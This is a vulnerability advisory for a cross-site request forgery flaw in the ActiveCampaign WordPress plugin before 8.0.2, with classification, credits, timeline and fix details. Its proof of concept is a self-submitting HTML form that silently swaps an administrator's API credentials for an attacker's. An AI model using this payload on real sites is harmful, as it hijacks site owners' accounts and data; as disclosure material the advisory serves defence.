WordPress Plugin Vulnerabilities

ActiveCampaign < 8.0.2 - Cross-Site Request Forgery in Settings

Description

The ActiveCampaign 8.0.1 plugin is lacking CSRF check on its Settings form, which could allow attacker to make a logged-in administrator change API Credentials to attacker's account.

Proof of Concept

When a logged-in administrator accesses an HTML page embedded below content, the plugin's setting will be changed.

<html>
  <body>
    <form action="http://example.com/wp-admin/options-general.php?page=activecampaign" method="POST">
      <input type="hidden" name="api_url" value="https://yopmail59247.api-us1.com" />
      <input type="hidden" name="api_key" value="1eddfe8b3ac848b2154b0f6a1a345730ecef457745c2b70463e0a4838fd30d681ec20369" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Affects Plugins

Plugin icon
activecampaign-subscription-forms
Fixed in 8.0.2

References

CVE
CVE-2021-24133
URL
https://plugins.trac.wordpress.org/changeset/2375366

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
7.6 (high)

Miscellaneous

Original Researcher
Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Submitter
Nguyen Anh Tien
Submitter website
https://research.sun-asterisk.com/
Submitter twitter
vigov5
Verified
Yes
WPVDB ID
a72a5be4-654b-496f-94cd-3814c0e40120

Timeline

Publicly Published
2020-09-06 (about 3 years ago)
Added
2020-09-06 (about 3 years ago)
Last Updated
2021-01-22 (about 3 years ago)

Other

Published
Title
Published
2022-01-24
Title
WP Dependency Installer < 4.3.1 - Arbitrary Plugin Installation from Dependency via CSRF
Published
2014-08-01
Title
Wordpress 3.3.1 - Multiple CSRF Vulnerabilities
Published
2023-03-29
Title
Affiliates Manager < 2.9.21 - Cross-Site Request Forgery
Published
2023-10-26
Title
Auto Limit Posts Reloaded <= 2.5 - Cross-Site Request Forgery
Published
2014-08-01
Title
Under Construction 1.08 - Setting Manipulation CSRF